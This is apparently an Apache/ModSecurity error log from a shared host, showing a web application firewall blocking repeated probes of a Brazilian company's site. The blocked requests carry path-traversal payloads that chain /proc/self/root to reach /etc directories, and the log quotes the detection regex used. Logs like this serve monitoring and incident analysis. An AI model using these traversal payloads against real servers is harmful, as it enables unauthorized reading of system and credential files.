[Mon Mar 16 08:22:05.633197 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:45308] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn3dSswJuvopo3lOhFJAAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:22:07.968275 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:45316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn37ysWC90G-1nBrAqdQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:09.023796 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:54016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn4bysWC90G-1nBrAqdgAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:22:10.399327 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.241.46:56908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn4hXjF1vJNtV6CWrfAQAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:11.775431 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.241.46:56916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn45qj1wV0Si-OkefNnQAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:22:17.464263 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:36896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn6dSswJuvopo3lOhFLQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:20.681557 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:56924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn7Jqj1wV0Si-OkefNpAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:28.256057 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.241.46:58358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn9I6lpbStxTqkSktRxwAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:29.981991 2026] [mime_magic:error] [pid 21533:tid 140411641214720] (70014)End of file found: [client 74.7.243.203:36900] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/cache/man
[Mon Mar 16 08:22:30.648862 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.241.46:44322] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn9pqj1wV0Si-OkefNpgAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:22:34.086575 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:44332] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn-o6lpbStxTqkSktRywAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:50.940708 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.244.31:52726] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfoCo6lpbStxTqkSktRzAAAAkc"]
[Mon Mar 16 08:22:53.183444 2026] [:error] [pid 10709:tid 140411574073088] [client 74.7.241.46:44334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoDRXjF1vJNtV6CWrfUwAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:55.398955 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.243.203:49580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoDQlT9VtDQc7bgUyMqgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:22:56.400473 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.241.46:57052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoEHjZBu2q05ozVU86IQAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:58.807580 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.241.46:57068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoEo6lpbStxTqkSktRzgAAAk8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:00.133265 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.241.46:59178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoFAlT9VtDQc7bgUyMqwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:23:01.441885 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.241.46:59192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoFQlT9VtDQc7bgUyMrAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:23:02.723692 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.241.46:59200] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoFglT9VtDQc7bgUyMrwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:04.062750 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.241.46:59206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoGHjZBu2q05ozVU86IgAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:08.607326 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.241.46:59222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoHI6lpbStxTqkSktR0gAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:09.927212 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.241.46:50982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoHZqj1wV0Si-OkefNqAAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:11.837233 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:35536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoH7ABkC4fWIHEf8HQtgAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:12.242912 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:50994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoII6lpbStxTqkSktR1wAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:23:15.223520 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:50996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoI9SswJuvopo3lOhFMQAAAI0"], referer: 